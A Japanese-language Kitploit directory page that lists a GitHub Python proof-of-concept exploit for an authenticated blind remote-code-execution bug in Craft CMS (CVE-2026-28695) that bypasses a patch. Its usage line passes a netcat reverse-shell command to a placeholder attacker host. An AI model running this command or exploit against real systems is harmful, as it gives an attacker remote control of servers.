Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-28695 — CVE-2026-28695 の Python PoC エクスプロイト。Craft CMS における認証済みブラインド RCE であり、create() BaseObject パッチをバイパスしてリバースシェルを起動します。 | Kitploit
ツール/GitHubGitHub/predyy/cve-2026-28695
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングリモートアクセスツール
GitHubpredyy/cve-2026-28695

CVE-2026-28695

CVE-2026-28695 の Python PoC エクスプロイト。Craft CMS における認証済みブラインド RCE であり、create() BaseObject パッチをバイパスしてリバースシェルを起動します。

リポジトリを見る
134日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-28695 パッチバイパス - Craft CMS ブラインドRCE

Craft CMS における認証済みブラインドリモートコード実行。CVE-2026-28695 の修正(コミット e31e508)で追加された create() - BaseObject 制限をバイパスします。

使用方法

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

免責事項

このスクリプトは教育目的のみを意図しています。作者は、このエクスプロイトによるいかなる誤用や損害についても責任を負いません。脆弱性をテストまたは悪用する前に、必ず許可を得ていることを確認してください!

ツールをダウンロード